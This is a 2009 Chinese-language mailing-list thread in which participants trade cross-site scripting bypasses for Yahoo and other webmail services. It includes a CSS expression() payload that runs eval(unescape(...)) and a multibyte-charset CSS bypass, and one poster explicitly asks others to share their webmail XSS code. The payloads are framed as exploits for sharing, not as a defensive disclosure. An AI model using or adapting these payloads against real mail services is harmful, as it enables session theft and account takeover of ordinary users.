字符集已经过时了,去年到今年一直是语法绕过! 在 09-6-2,阿賢<[email protected]> 写道: > 二楼的是的似乎不是用字符集bypass.而描述里说的是MBCS环境字符集bypass.而据我所知yahoo字符是utf-8,无奈ing. > 我希望大家可以交流分享一下各webmail XSS的代码,我在此先放出一段的代码.(可惜上星期己失效) > <style>div{font:'\' > ';'}a';background-image:expression((window.rrr==1)?'':eval('rrr=1;eval(unescape(%27%61%6C%65%72%74%28%2F%78%73%73%2F%29%27));'));}'{}</style><div > id="myp">hhhhh</div> > > 2009/6/2 vul crack <[email protected]> > >> yahoo xss >> 今年的研究速度明显慢于去年,去年下半年爆了那么多,但是基本一周新的就能出来,今年到现在已经是第三个了,爆了两次,每次的研究时间变成10天左右了,不知道下半年形式会怎么样? >> >> 在 09-5-31,阿賢<[email protected]> 写道: >> > n<style> >> > #x{ >> > background: url('http://www.google.cn{chr}');background: url('http:// >> > ;color:red;www.google.cn'); >> > } >> > </style> >> > <div id="x">codz</div> >> > 描述: >> > nYahoo修复过在html属性里出现的字符集问题 >> > n字符集问题不只出现在html属性,同样存在于css,js等地方 >> > nYahoo的Filter基于语法分析,语法分析的时候为非MBCS字符集 >> > nFilter没有处理好在css里的非法字符,导致MBCS环境下的xss >> > >> > 问:窃以为Exploit里chr便是代码写入触发CSS的地方.却一直没有明白这样的语句究竟如何能触发CSS.更不明白后面;background: >> > url('http://;color:red;www.google.cn'); .恳请大家给与指导. >> > >> > > >> > >> >> > >> > > > >
--~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [email protected] -~----------~----~----~----~------~----~------~--~---

